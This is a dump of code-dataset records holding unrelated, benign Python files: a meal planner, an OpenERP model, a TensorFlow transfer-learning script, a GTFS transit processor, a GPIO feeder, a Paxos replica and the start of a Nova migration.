'r') as cal:\n            data = json.load(cal)\n            calories = data[user_ID][7]\n    else:\n        calories = input(\"Enter your daily caloric intake: \")\n\n    for_breakfast = (int(calories) * 32.5) / 100\n    for_lunch = (int(calories) * 37.5) / 100\n    for_dinner = (int(calories) * 30) / 100\n    divider()\n    print(\"For breakfast:\")\n    day_plan(for_breakfast)\n    print(\"For lunch:\")\n    day_plan(for_lunch)\n    print(\"For dinner:\")\n    day_plan(for_dinner)\n\n# Finding the closest amount of calories to the recommendation and\n# printing out the recipe name, calories, carbs, fats and proteins.\n\ndef day_plan(calories):\n    cal_array = []\n    recipes = json.load(open(\"recipes.json\"))\n    for key in recipes:\n        cal_array.append(recipes[key][0])\n    closest = cal_array[min(range(len(cal_array)), key = lambda i: abs(cal_array[i]-calories))]\n\n    for key in recipes:\n        if recipes[key][0] == closest:\n            divider()\n            print((\" Recipe: {}.\").format(key))\n            print((\" Calories: {}.\").format(recipes[key][0]))\n            print((\" Carbs: {}.\").format(recipes[key][1]))\n            print((\" Fats: {}.\").format(recipes[key][2]))\n            print((\" Proteins: {}.\").format(recipes[key][3]))\n            divider()\n\ndef divider():\n    print(\"-------------------------\")\n\nmenu()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"251798794","text":"#-*- coding: utf-8 -*-\n\nfrom openerp.osv import fields, osv\n\nclass Escolaridad(osv.Model):\n\t_name = \"cein.escolaridad\"\n\t_columns = {\n\t\t'name': fields.char(string=\"Nombre\",\t size=256, required=True,help=\"Nombre sin acentos opcionalmente para optimizar busquedas\"),\n\t\t'displayname': fields.char(string=\"Display Nombre\",\t size=256, required=True,help=\"Nombre con acentos a mostrar\"),\n\t\t'codlegado': fields.integer('Codigo Legado',required=True, help=\"Codigo legado\"),\n\t\t'activo': fields.boolean(\"Activado\"),\n\t\t'descripcion': fields.text(\"Description\", required=False, help=\"Descripcion\"),\n\t}\n\t_defaults = {\n\t\t'activo': True,\t\n\t}\n\n\t_sql_constraints = [\n\t('cod_legado_unique',\t\n\t'UNIQUE(codlegado)',\n\t'¡No se permite duplicar ID legados!'),\n\t('name_unique',\t\n\t'UNIQUE(name)',\n\t'¡No se permite duplicar 
Nombre!'),\n\t('displayname_unique',\t\n\t'UNIQUE(displayname)',\n\t'¡No se permite duplicar displayname!'),\n]","sub_path":"model/escolaridad.py","file_name":"escolaridad.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"73121507","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jan 24 00:54:22 2018\n\n@author: Ze\n\"\"\"\nimport time\n\ntime1 = time.time()\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib as mlp\nimport tensorflow as tf\nimport os\n\n\ndef read_and_decode(filename):\n    filename_queue = tf.train.string_input_producer([filename])\n\n    reader = tf.TFRecordReader()\n    _, serialized_example = reader.read(filename_queue)\n    features = tf.parse_single_example(serialized_example,\n                                       features={\n                                           'label': tf.FixedLenFeature([], tf.int64),\n                                           'image_raw': tf.FixedLenFeature([], tf.string),\n                                       })\n\n    img = tf.decode_raw(features['image_raw'], tf.uint8)\n    img = tf.reshape(img, [240, 240, 3])\n\n    # img = tf.cast(img, tf.float32) * (1. / 255) - 0.5\n    # img = tf.reshape(img, [14400])\n    label = tf.cast(features['label'], tf.int64)\n\n    return img, label\n\n\ndef get_batch(image, label, batch_size):\n    images, label_batch = tf.train.shuffle_batch([image, label], batch_size=batch_size,\n                                                 capacity=3000, min_after_dequeue=200)\n\n    return images, tf.reshape(label_batch, [batch_size])\n\n\nclass Network(object):\n    def __init__(self, learning_rate, batch):\n        self.learning_rate = learning_rate\n        self.batch_size = batch\n        with tf.variable_scope(\"weights\"):\n            self.weights = {\n                'conv1': tf.get_variable('conv1', [3, 3, 3, 16],\n                                         initializer=tf.contrib.layers.xavier_initializer_conv2d()),\n                'conv2': tf.get_variable('conv2', [3, 3, 16, 32],\n                                         initializer=tf.contrib.layers.xavier_initializer_conv2d()),\n                'conv3': tf.get_variable('conv3', [3, 3, 32, 64],\n                                         initializer=tf.contrib.layers.xavier_initializer_conv2d()),\n                'conv4': tf.get_variable('conv4', [3, 3, 64, 128],\n                                         initializer=tf.contrib.layers.xavier_initializer_conv2d()),\n                'conv5': tf.get_variable('conv5', [3, 3, 128, 64],\n                                         initializer=tf.contrib.layers.xavier_initializer_conv2d()),\n                'fc1': tf.get_variable('fc1', [7 * 7 * 64, 1024],\n                                       initializer=tf.contrib.layers.xavier_initializer()),\n                'fc2': tf.get_variable('fc2', [1024, 24],\n                                       initializer=tf.contrib.layers.xavier_initializer()),\n            }\n        with tf.variable_scope(\"biases\"):\n            self.biases = {\n                'conv1': tf.get_variable('conv1', [16, ],\n                                         initializer=tf.constant_initializer(value=0.0, dtype=tf.float32)),\n                'conv2': tf.get_variable('conv2', [32, ],\n                                         initializer=tf.constant_initializer(value=0.0, dtype=tf.float32)),\n                'conv3': tf.get_variable('conv3', [64, ],\n                                         initializer=tf.constant_initializer(value=0.0, dtype=tf.float32)),\n                'conv4': tf.get_variable('conv4', [128, ],\n                                         initializer=tf.constant_initializer(value=0.0, dtype=tf.float32)),\n                'conv5': tf.get_variable('conv5', [64, ],\n                                         initializer=tf.constant_initializer(value=0.0, dtype=tf.float32)),\n                'fc1': tf.get_variable('fc1', [1024, ],\n                                       initializer=tf.constant_initializer(value=0.0, dtype=tf.float32)),\n                'fc2': tf.get_variable('fc2', [24, ],\n                                       initializer=tf.constant_initializer(value=0.0, dtype=tf.float32))\n            }\n\n    def inference(self, images):\n        with tf.name_scope(name='inference'):\n            images = tf.reshape(images, shape=[-1, 240, 240, 3])\n            images = (tf.cast(images, tf.float32) / 255. 
- 0.5) * 2\n\n conv1 = tf.nn.bias_add(tf.nn.conv2d(images, self.weights['conv1'], strides=[1, 1, 1, 1], padding='SAME'),\n self.biases['conv1'])\n bn1 = tf.layers.batch_normalization(conv1)\n relu1 = tf.nn.relu(bn1)\n pool1 = tf.nn.max_pool(relu1, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='VALID')\n\n conv2 = tf.nn.bias_add(tf.nn.conv2d(pool1, self.weights['conv2'], strides=[1, 1, 1, 1], padding='SAME'),\n self.biases['conv2'])\n bn2 = tf.layers.batch_normalization(conv2)\n relu2 = tf.nn.relu(bn2)\n pool2 = tf.nn.max_pool(relu2, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='VALID')\n\n conv3 = tf.nn.bias_add(tf.nn.conv2d(pool2, self.weights['conv3'], strides=[1, 1, 1, 1], padding='SAME'),\n self.biases['conv3'])\n bn3 = tf.layers.batch_normalization(conv3)\n relu3 = tf.nn.relu(bn3)\n pool3 = tf.nn.max_pool(relu3, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='VALID')\n\n conv4 = tf.nn.bias_add(tf.nn.conv2d(pool3, self.weights['conv4'], strides=[1, 1, 1, 1], padding='SAME'),\n self.biases['conv4'])\n bn4 = tf.layers.batch_normalization(conv4)\n pool4 = tf.nn.max_pool(bn4, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='VALID')\n\n conv5 = tf.nn.bias_add(tf.nn.conv2d(pool4, self.weights['conv5'], strides=[1, 2, 2, 1], padding='VALID'),\n self.biases['conv5'], name='layer_conv5')\n bn5 = tf.layers.batch_normalization(conv5)\n flatten = tf.reshape(bn5, [-1, self.weights['fc1'].get_shape().as_list()[0]])\n # dropout 正则化\n drop1 = tf.nn.dropout(flatten, 0.5)\n fc1 = tf.nn.bias_add(tf.matmul(drop1, self.weights['fc1']), self.biases['fc1'], name='layer_fc1')\n fc_relu1 = tf.nn.relu(fc1)\n fc2 = tf.nn.bias_add(tf.matmul(fc_relu1, self.weights['fc2']), self.biases['fc2'], name='layer_fc2')\n\n return fc2\n\n def inference_fc1(self, images):\n with tf.name_scope(name='inference_fc1'):\n images = tf.reshape(images, shape=[-1, 240, 240, 3])\n images = (tf.cast(images, tf.float32) / 255. 
- 0.5) * 2\n\n conv1 = tf.nn.bias_add(tf.nn.conv2d(images, self.weights['conv1'], strides=[1, 1, 1, 1], padding='SAME'),\n self.biases['conv1'])\n bn1 = tf.layers.batch_normalization(conv1)\n relu1 = tf.nn.relu(bn1)\n pool1 = tf.nn.max_pool(relu1, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='VALID')\n\n conv2 = tf.nn.bias_add(tf.nn.conv2d(pool1, self.weights['conv2'], strides=[1, 1, 1, 1], padding='SAME'),\n self.biases['conv2'])\n bn2 = tf.layers.batch_normalization(conv2)\n relu2 = tf.nn.relu(bn2)\n pool2 = tf.nn.max_pool(relu2, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='VALID')\n\n conv3 = tf.nn.bias_add(tf.nn.conv2d(pool2, self.weights['conv3'], strides=[1, 1, 1, 1], padding='SAME'),\n self.biases['conv3'])\n bn3 = tf.layers.batch_normalization(conv3)\n relu3 = tf.nn.relu(bn3)\n pool3 = tf.nn.max_pool(relu3, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='VALID')\n\n conv4 = tf.nn.bias_add(tf.nn.conv2d(pool3, self.weights['conv4'], strides=[1, 1, 1, 1], padding='SAME'),\n self.biases['conv4'])\n bn4 = tf.layers.batch_normalization(conv4)\n pool4 = tf.nn.max_pool(bn4, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='VALID')\n\n conv5 = tf.nn.bias_add(tf.nn.conv2d(pool4, self.weights['conv5'], strides=[1, 2, 2, 1], padding='VALID'),\n self.biases['conv5'], name='layer_conv5')\n bn5 = tf.layers.batch_normalization(conv5)\n flatten = tf.reshape(bn5, [-1, self.weights['fc1'].get_shape().as_list()[0]])\n # dropout 正则化\n drop1 = tf.nn.dropout(flatten, 0.5)\n fc1 = tf.nn.bias_add(tf.matmul(drop1, self.weights['fc1']), self.biases['fc1'], name='layer_fc1')\n\n return fc1\n\n def sorfmax_loss(self, predicts, labels):\n labels = tf.one_hot(labels, self.weights['fc2'].get_shape().as_list()[1]) # as——list得到第二个维度(2分类为2)\n loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits_v2(logits=predicts, labels=labels))\n self.cost = loss\n return self.cost\n\n def optimer(self, loss):\n global_step = tf.Variable(0)\n learning_rate = tf.train.exponential_decay(self.learning_rate, global_step,\n decay_steps=50, decay_rate=0.9,\n staircase=True)\n train_optimizer = tf.train.AdamOptimizer(learning_rate).minimize(loss)\n return train_optimizer\n\n\ndef transfer_inference(input, num_class):\n with tf.name_scope(name=\"transfer_layer1\"):\n weights = tf.get_variable(shape=[1024, 64], name=\"layer1_w\")\n bias = tf.get_variable(shape=[64, ], name=\"layer1_b\")\n fc_layer1 = tf.nn.relu(tf.add(tf.matmul(input, weights), bias), name=\"fc_layer1\")\n # with tf.name_scope(name=\"transfer_layer2\"):\n # weights = tf.get_variable(shape=[128, 64], name=\"layer2_w\")\n # bias = tf.get_variable(shape=[64, ], name=\"layer2_b\")\n # fc_layer2 = tf.nn.relu(tf.add(tf.matmul(fc_layer1, weights), bias), name=\"fc_layer2\")\n with tf.name_scope(name=\"transfer_layer3\"):\n weights = tf.get_variable(shape=[64, num_class], name=\"layer3_w\")\n bias = tf.get_variable(shape=[num_class, ], name=\"layer3_b\")\n fc_layer3 = tf.add(tf.matmul(fc_layer1, weights), bias, name=\"y_pred\")\n return fc_layer3\n\n\ndef compute_loss(y_pred, y_true, num_class):\n labels = tf.one_hot(y_true, num_class)\n loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits_v2(labels=labels, logits=y_pred))\n return loss\n\n\ndef train(lr=0.0001, epochs=1000):\n tf.reset_default_graph()\n net = Network(0.0001, 64)\n # inference and calculate the accuracy in train data\n with tf.name_scope('input'):\n x = tf.placeholder(tf.float32, [net.batch_size, 240, 240, 3], name='x')\n y = tf.placeholder(tf.int64, [net.batch_size, ], name='y')\n 
layer_fc1 = net.inference_fc1(x)\n\n feature_layer = tf.stop_gradient(layer_fc1)\n y_pred = transfer_inference(feature_layer, num_class=10)\n loss = compute_loss(y_pred, y, num_class=10)\n tf.summary.scalar(\"loss\", loss)\n train_step = tf.train.AdamOptimizer(lr).minimize(loss)\n correct_pred = tf.equal(tf.argmax(y_pred, 1), y)\n train_acc = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n tf.summary.scalar(\"accuracy\", train_acc)\n\n data_path = \"casy_test_data_10class.tfrecords\"\n # data_path = \"tongji_test_data_rpm1000.tfrecords\"\n # data_path = \"tongji_data_4_class_diff_rpm_test.tfrecords\"\n train_image, train_label = read_and_decode(data_path)\n train_batch_image, train_batch_label = get_batch(train_image, train_label, batch_size=64)\n\n test_image, test_label = read_and_decode(data_path)\n test_batch_image, test_batch_label = get_batch(test_image, test_label, batch_size=64)\n merged = tf.summary.merge_all()\n # saver = tf.train.Saver()\n ckpt = tf.train.get_checkpoint_state('./model/0.0001_64/')\n # 只加载conv部分参数,其他参数初始化\n var = tf.global_variables()\n var_to_restore = [val for val in var if 'conv' in val.name]\n # var_to_restore = [val for val in var if 'conv1' in val.name or 'conv2' in val.name or 'conv3' in val.name]\n saver = tf.train.Saver(var_to_restore)\n var_to_init = [val for val in var if 'conv' not in val.name]\n tf.variables_initializer(var_to_init)\n train_costs = []\n train_accs = []\n test_accs = []\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n with tf.Session(config=config) as sess:\n # saver.restore(sess, tf.train.latest_checkpoint('./model/0.0001_64/'))\n sess.run(tf.global_variables_initializer())\n saver.restore(sess, ckpt.model_checkpoint_path)\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(coord=coord)\n\n writer = tf.summary.FileWriter('path/to/transfer_log/transfer_train_log')\n writer_test = tf.summary.FileWriter('path/to/transfer_log/transfer_testlog')\n for i in range(epochs):\n batch_x, batch_y = sess.run([train_batch_image, train_batch_label])\n summary, acc, loss_np, _ = sess.run([merged, train_acc, loss, train_step],\n feed_dict={x: batch_x, y: batch_y})\n\n test_x, test_y = sess.run([test_batch_image, test_batch_label])\n summary_test, test_loss, y_pred_, test_acc = sess.run([merged, loss, y_pred, train_acc],\n feed_dict={x: test_x, y: test_y})\n\n writer.add_summary(summary, i)\n writer_test.add_summary(summary_test, i)\n \n train_costs.append(loss_np)\n train_accs.append(acc)\n test_accs.append(test_acc)\n if i % 10 == 0:\n print('***************epochs:', i, '*************')\n print('***************train loss:', loss_np)\n print('***************train accruacy:', acc, '*************')\n print(\"***********test_accuracy:\", test_acc, \"*********\\n\")\n\n save_path = \"E:\\\\tf_learning(2)\\\\logs\\\\transfer_from_base_to_casy\\\\\"\n np.savetxt(os.path.join(save_path, \"train_loss.txt\"), train_costs)\n np.savetxt(os.path.join(save_path, \"train_acc.txt\"), train_accs)\n np.savetxt(os.path.join(save_path, \"test_acc.txt\"), test_accs)\n\n\n # if i > 80 and i % 10 == 0:\n # saver.save(sess, './new_transfered_model/model.ckpt', global_step=i + 1)\n # if loss_np < 0.01:\n # break\n # if test_acc > 0.9:\n # time2 = round((time.time() - time1) / 60, 2)\n # print(\"达到 %.3f cost %d iterations and %.2f min\" % (test_acc, i, time2))\n # if test_acc > 0.95:\n # time2 = round((time.time() - time1) / 60, 2)\n # print(\"达到 %.3f cost %d iterations and %.2f min\" % (test_acc, i, time2))\n # if test_acc > 
0.98:\n # time2 = round((time.time() - time1) / 60, 2)\n # print(\"达到 %.3f cost %d iterations and %.2f min\" % (test_acc, i, time2))\n # break\n\n writer.close()\n coord.request_stop()\n # queue需要关闭,否则报错\n coord.join(threads)\n time2 = round((time.time() - time1) / 60, 2)\n print(\"cost time: %.2f min\" % time2)\n # return test_y, np.argmax(y_pred_, 1)\n\n\n# os.chdir('E:\\\\transfer_learning\\\\')\nos.chdir(os.path.dirname(__file__))\ntrain()\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"transfer_train_from_base_to_others.py","file_name":"transfer_train_from_base_to_others.py","file_ext":"py","file_size_in_byte":15260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"482621732","text":"#!/usr/bin/env python3\nimport pandas as pd\nimport re\nimport sys\nimport argparse\nimport os\nimport functools\n\n\ndef time_to_parts(time):\n time_parts = [int(x) for x in time.split(\":\")]\n return time_parts[0] * 3600 + time_parts[1] * 60 + time_parts[2]\n\n\ndef compute_diff(t1, t2):\n time1 = time_to_parts(t1)\n time2 = time_to_parts(t2)\n return time2 - time1\n\n\ndef process_name(st_name):\n return re.sub(r\" - [ABC]\", \"\", st_name)\n\n\ndef compute_all_diferences(arrival_times, departure_times):\n return [compute_diff(first, second)\n for first, second in zip(arrival_times, departure_times)]\n\n\ndef create_csv(joined, output_path, suffix, stops):\n grouped = joined.groupby(\"trip_id\", sort=True)\n data = []\n for group in grouped:\n g = group[1].sort_values(by=\"stop_sequence\")\n stations = [\"->\".join(x) for x in zip(g.stop_name.apply(process_name),\n g.stop_name[1:].apply(process_name))]\n times = compute_all_diferences(g.arrival_time, g.arrival_time[1:])\n data += [{\"section\": x[0], \"time\": x[1]} for x in zip(stations, times)]\n df = pd.DataFrame.from_records(data)\n grouped = df.groupby(\"section\").mean()\n df2 = grouped.copy()\n sections = grouped.index.map(lambda x: x.split(\"->\"))\n df2[\"departure_station\"] = [x[0] for x in sections]\n df2[\"arrival_station\"] = [x[1] for x in sections]\n df2.to_csv(os.path.join(output_path, \"times{0}.csv\".format(suffix)))\n stops2 = stops.copy()\n stops2[\"stop_name\"] = stops2.stop_name.apply(lambda x: process_name(x)[0])\n stops_grouped = stops2.groupby(\"stop_name\").mean()\n stops_grouped[[\"stop_lat\", \"stop_lon\"]].apply(lambda x: x.round(6)).to_csv(os.path.join(output_path, \"locations{0}.csv\".format(suffix)))\n\n\ndef parse_arguments(argv):\n parser = argparse.ArgumentParser(description='Process Prague data')\n parser.add_argument('data_path', type=str,\n help=\"Path to the folder containing GTFS files\")\n parser.add_argument(\"output_path\", type=str,\n help=\"Path to output folder.\")\n return parser.parse_args(argv)\n\n\ndef main(argv):\n args = parse_arguments(argv)\n stops_cols = [\"stop_id\", \"stop_lat\", \"stop_lon\", \"stop_name\"]\n stops = pd.read_csv(os.path.join(args.data_path, \"stops.txt\"))[stops_cols]\n stop_times = pd.read_csv(os.path.join(args.data_path,\n \"stop_times.txt\"))\n trips = pd.read_csv(os.path.join(args.data_path, \"trips.txt\"))\n calendar = pd.read_csv(os.path.join(args.data_path, \"calendar.txt\"))\n routes = pd.read_csv(os.path.join(args.data_path, \"routes.txt\"))\n joined = functools.reduce(lambda x, y: x.merge(y[0], on=y[1]),\n [(stop_times, \"trip_id\"),\n (calendar, \"service_id\"), (stops, \"stop_id\"),\n (routes, \"route_id\")], trips)\n print(\"Data loaded\")\n night_start = time_to_parts(\"00:00:00\")\n night_end = 
time_to_parts(\"05:00:00\")\n\n joined[\"arrival_time_seconds\"] = joined.arrival_time.apply(time_to_parts)\n joined[\"departure_time_seconds\"] = joined.departure_time.apply(time_to_parts)\n\n night_time = joined[(joined.departure_time_seconds >= night_start) &\n (joined.departure_time_seconds < night_end)]\n day_time = joined[joined.departure_time_seconds >= night_end]\n\n create_csv(night_time, args.output_path, \"_night\", stops)\n print(\"Created night data.\")\n create_csv(day_time, args.output_path, \"_day\", stops)\n print(\"Created day data.\")\n\n # joined = trips.merge(stop_times, on=\"trip_id\").\n # merge(calendar, on=\"service_id\").merge(stops, on=\"stop_id\").\n # merge(routes, on=\"route_id\")\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","sub_path":"process_data.py","file_name":"process_data.py","file_ext":"py","file_size_in_byte":3794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"101022662","text":"from gpiozero import LED\nfrom time import sleep \nimport os\nimport datetime \n\nopenDoor = LED(27) # PIN 27\ncloseDoor = LED(22) # PIN 22\n\ndef feed(time):\n time = float(time) # time to hold the 'on' task\n openDoor.on() # open the door\n closeDoor.off() # don't close the door\n sleep(1 + time)\n openDoor.off()\n\ndef close():\n timeOff = 1 # time to hold to the 'off' task\n closeDoor.on() # close the door \n sleep(timeOff)\n closeDoor.off()\n ","sub_path":"python/doorSystem.py","file_name":"doorSystem.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"416751351","text":"\"\"\"\r\nAdvent of code 2020\r\nDay1 Part2\r\nThe point of this exercise is to find 3 entries that sum to 2020 and then multiply\r\nthem to entray to get the answer\r\n\"\"\"\r\n#get file object\r\nimport random as r\r\nf = open(\"input.txt\", \"r\")\r\nliste = []\r\nwhile(True):\r\n\t#read next line\r\n\tline = f.readline()\r\n\t#if line is empty, you are done with all lines in the file\r\n\tif not line:\r\n\t\tbreak\r\n\t#you can access the line\r\n\tliste.append(line.strip())\r\n\r\n\r\n#Triple loop to try every sum in the array\r\nfor i in range(len(liste)):\r\n for y in range(len(liste)):\r\n for x in range(len(liste)):\r\n if int(liste[i])+int(liste[y])+int(liste[x]) == 2020:\r\n \r\n print(int(liste[i])*int(liste[y])*int(liste[x]))\r\n\r\n\r\nf.close","sub_path":"Day1/Mission1_P2.py","file_name":"Mission1_P2.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"415266769","text":"from faker import Faker\n\nfake = Faker()\n\nclass BusinessCard:\n def __init__(self, first_name, last_name, company, job, email):\n self.first_name = first_name\n self.last_name = last_name\n self.company = company\n self.job = job\n self.email = email\n\n @property\n def label_lenght(self):\n return len(f\"{self.first_name}, {self.last_name}\")\n\n @property\n def __str__(self):\n return f'{self.first_name}, {self.last_name},{self.company}, {self.job}, {self.email}'\n\n def __repr__(self):\n return 'BusinessCard(first_name: %s, last_name: %s, company: %s, job: %s, email: %s, phone_number: %s)' % (\n self.first_name, self.last_name, self.company, self.job, self.email, self.phone_number)\n\nclass BaseContact(BusinessCard):\n def __init__(self, phone_number, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.phone_number = phone_number\n\n def 
__str__(self):\n        return 'first_name : {}, last_name : {}, company {}, job : {}, email :{}, phone_number : {}' \\\n            .format(self.first_name, self.last_name, self.company, self.job, self.email, self.phone_number)\n\n    def contact(self):\n        return f\"Wybieram prywatny numer {self.phone_number} i dzwonię do {self.first_name} {self.last_name}.\"\n\n\nclass BusinessContact(BaseContact):\n    def __init__(self, phone_job, *args, **kwargs):\n        super().__init__(phone_job, *args, **kwargs)\n        self.phone_number = phone_job\n\n    def contact(self):\n        return f\"Wybieram prywatny numer {self.phone_number} i dzwonię do {self.first_name} {self.last_name}.\"\n\n\n# Funkcje drukowania list wizytówek\n\ndef base(copies):\n    base_contact_list = []\n    for contact in range(copies):\n        contact = BaseContact(\n            first_name=fake.first_name(),\n            last_name=fake.last_name(),\n            company=fake.company(),\n            job=fake.job(),\n            phone_number=fake.phone_number(),\n            email=fake.email()\n        )\n        base_contact_list.append(contact)\n    return base_contact_list\n\n\ndef business(copies):\n    business_contact_list = []\n    for contact in range(copies):\n        contact = BusinessContact(\n            first_name=fake.first_name(),\n            last_name=fake.last_name(),\n            company=fake.company(),\n            job=fake.job(),\n            phone_job=fake.phone_number(),\n            email=fake.email(),\n        )\n        business_contact_list.append(contact)\n\n    return business_contact_list\n\ndef create_contact():\n    type = input(\"Jakiego rodzaju chcesz wizytówki? 1 = Business, 2 = Bazowe: \")\n    copies = int(input(\"Ile chcesz wizytówek?: \"))\n    if type == \"1\":\n        contacts = business(copies)\n        print(business(copies))\n        print(len(contacts))\n\n    elif type == \"2\":\n        contacts = base(copies)\n        print(base(copies))\n        print(len(contacts))\n\n    else:\n        error = \"error\"\n        print(error)\n        exit()\n\n\n# Program\nif __name__ == \"__main__\":\n    print(\"Hello\")\n    print(\"Print Y/N to create new contact cards: \")\n\n    choice = input(\"Enter your choice: \")\n\nwhile True:\n    if choice in (\"Y\", \"y\"):\n        create_contact()\n        continue\n\n    else:\n        error = \"error\"\n        print(error)\n        exit()\n","sub_path":"Kodilla/Module_7/Module_7_task_1.py","file_name":"Module_7_task_1.py","file_ext":"py","file_size_in_byte":3274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"618681310","text":"\nimport itertools as it\nimport logging\n\nfrom . 
import common\nfrom .common import msg\nimport utils\n\n\nclass Replica(common.PaxosActor):\n    def __init__(self, leaders, hndlr=None):\n        self.log = logging.getLogger(__name__)\n        self.log.addHandler(hndlr or logging.NullHandler())\n\n        self.leaders = leaders\n\n        self.slot_num = 0\n        self.proposals = utils.SparseList()\n        self.decisions = utils.SparseList()\n\n        self._routes = {\n            msg.request: self._request,\n            msg.decision: self._decision,\n        }\n\n    def recover(self, states):\n        def _join(args):\n            assert all(x == args[0] for x in args)\n            return args[0]\n\n        dcns = utils.SparseList.merged(*[utils.SparseList.from_serializable(st)\n                                         for st, _ in states])\n        self.proposals = utils.SparseList()\n        try:\n            slot, *args = next(dcns)\n            self.decisions = utils.SparseList(\n                [_join(args)] + [_join(args) for _, *args in dcns], start=slot)\n            self.slot_num = max(slot for _, slot in states)\n        except:\n            pass\n\n    def get_state(self):\n        return (utils.SparseList.serializable(self.decisions), self.slot_num)\n\n    def all_clear(self):\n        return (not self.proposals or\n                all(p is None for p in self.proposals))\n\n    def _request(self, message):\n        self.log.info(\"Received request: %s\", message)\n        return self.propose(message['command'])\n\n    def propose(self, command):\n        if command in self.decisions:\n            return []\n\n        slot = min({\n            s for s, prop, decn in utils.SparseList.merged(\n                self.proposals, self.decisions)\n            if prop is None and decn is None\n        } or {max(len(self.decisions), len(self.proposals), self.slot_num)})\n\n        self.log.debug(\"Proposing %s -> %s\", slot, command)\n\n        self.proposals[slot] = command\n        return [{\n            'action': msg.propose,\n            'slot': slot,\n            'command': command,\n            'to': leader,\n        } for leader in self.leaders]\n\n    def _decision(self, message):\n        slot = message['slot']\n        self.log.info(\"Decision received for slot %s: %s\",\n                      slot, message['command'])\n        if slot < self.slot_num:\n            return []\n        assert(self.decisions[slot] in {None, message['command']})\n        self.decisions[slot] = message['command']\n        responses = []\n\n        while self.decisions[self.slot_num]:\n            op = self.decisions[self.slot_num]\n\n            prop = self.proposals.pop(self.slot_num)\n            if prop:\n                responses.extend(self.propose(prop))\n\n            responses.append({\n                'action': msg.response,\n                'command': op,\n                'slot': self.slot_num,\n            })\n            self.slot_num += 1\n\n        del self.decisions[:self.slot_num]\n        del self.proposals[:self.slot_num]\n\n        return responses\n","sub_path":"paxos/replica.py","file_name":"replica.py","file_ext":"py","file_size_in_byte":3020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"131396048","text":"#!/usr/bin/python3\n# -*- coding:utf-8 -*-\n#装饰器示例\n\nimport functools,time\n\ndef metric(func):\n    @functools.wraps(func)\n    def wrapper(*args,**kw):\n        t = time.time()\n        f = func(*args,**kw)\n        print(\"This func {} takes {} times.\".format(func.__name__, time.time() - t))\n        return f\n    return wrapper\n\n\n#引用\n\n@metric\ndef fast(x,y):\n    time.sleep(0.00000005)\n    return x + y\n\n\n@metric\ndef slow(x,y,z):\n    time.sleep(0.1)\n    return x * y * z\n\n\nm = fast(11,22)\nn = slow(2,3,4)\nprint('m : {} \\t n : {}'.format(m,n))\n","sub_path":"decorator.py","file_name":"decorator.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"564883115","text":"# Copyright 2012 OpenStack LLC.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. 
You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom sqlalchemy import Boolean, Column, DateTime, String, ForeignKey, Integer\nfrom sqlalchemy import MetaData, String, Table\n\nfrom nova import context\nfrom nova import db\n\nfrom nova.openstack.common import log as logging\n\nLOG = logging.getLogger(__name__)\n\ndef _populate_instance_type_extra_specs(instance_types):\n try:\n instance_type_rows = list(instance_types.select().execute())\n for instance_type in instance_type_rows:\n flavorid = instance_type.flavorid\n name = instance_type.name\n if (name == 'm1.tiny') or \\\n (name == 'm1.small') or \\\n (name == 'm1.medium') or \\\n (name == 'm1.large') or \\\n (name == 'm1.xlarge'):\n extra_specs = dict(cpu_arch='s== x86_64',\n hypervisor_type='s== QEMU')\n elif (name == 'cg1.small'):\n extra_specs = dict(\n cpu_arch='s== x86_64',\n gpu_arch='s== fermi',\n gpus='= 1',\n hypervisor_type='s== LXC')\n elif (name == 'cg1.medium'):\n extra_specs = dict(\n cpu_arch='s== x86_64',\n gpu_arch='s== fermi',\n gpus='= 2',\n hypervisor_type='s== LXC')\n elif (name == 'cg1.large'):\n extra_specs = dict(\n cpu_arch='s== x86_64',\n gpu_arch='s== fermi',\n gpus='= 3',\n hypervisor_type='s== LXC')\n elif (name == 'cg1.xlarge'):\n extra_specs = dict(\n cpu_arch='s== x86_64',\n gpu_arch='s== fermi',\n gpus='= 4',\n hypervisor_type='s== LXC')\n elif (name == 'cg1.2xlarge'):\n extra_specs = dict(\n cpu_arch='s== 